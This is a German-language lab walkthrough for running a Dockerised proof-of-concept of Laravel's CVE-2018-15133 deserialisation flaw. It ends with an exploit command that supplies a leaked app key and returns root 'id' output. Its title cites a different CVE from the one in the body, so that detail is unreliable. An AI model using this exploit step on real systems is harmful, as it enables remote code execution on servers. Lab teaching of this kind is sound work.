
Deserialisierungs-Exploit-Ausführung mit CVE-2017-5941
Ausnutzen der Deserialisierungssicherheitslücke CVE-2018-15133 Dieser Exploit nutzt eine Deserialisierungssicherheitslücke im Laravel Framework bis Version 5.5.40 und 5.6.x bis 5.6.29 aus.
Remote-Code-Ausführung kann als Ergebnis eines unserialize-Aufrufs auf einen potenziell nicht vertrauenswürdigen X-XSRF-TOKEN-Wert auftreten. Dies betrifft die decrypt-Methode in Illuminate/Encryption/Encrypter.php und PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. Der Angreifer muss den Anwendungsschlüssel kennen, was normalerweise nie vorkommen würde, aber passieren kann, wenn der Angreifer zuvor privilegierten Zugriff hatte oder erfolgreich einen vorherigen Angriff durchgeführt hat.
Um diesen Exploit auszuführen, müssen Sie Folgendes auf Ihrem Rechner installiert haben:
Docker herunterladen und installieren.
Docker als Administrator öffnen.
Öffnen Sie die Eingabeaufforderung und laden Sie die Docker-Maschine:
docker pull kozmico/laravel-poc-cve-2018-15133
docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133
Dadurch wird die Laravel-Maschine gestartet.
Versuchen Sie, die Maschine im Browser zu öffnen, um sicherzustellen, dass die Maschine funktioniert.
Sie können dies mit der IP und dem Port tun. Um die IP unter Windows zu überprüfen, führen Sie aus:
ipconfig
Unter Linux
ifconfig
wsl --set-default-version 2
wsl --update
Laden Sie die Exploit-Datei auf Ihren Rechner herunter.
Öffnen Sie ein Terminal und navigieren Sie zu dem Ordner, in dem sich die Exploit-Datei befindet.
Führen Sie den folgenden Befehl aus, um den Server auszunutzen:
./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id"
Dies sollte Ihnen die Antwort mit der ID der Maschine geben, die Sie angreifen möchten. Sie können ähnliche Befehle verwenden, um Ordner anzufordern und andere Aufgaben auszuführen.
Antwort: uid=0(root) gid=0(root) groups=0(root)
Zusammenfassend konnten wir bei dieser Sicherheitslücke die Bedeutung der Aktualisierung von Frameworks beobachten. Da diese Tools Sicherheitsmängel aufweisen können und weit verbreitet sind, sind wir gefährdet, wenn wir uns nicht auf dem neuesten Stand halten.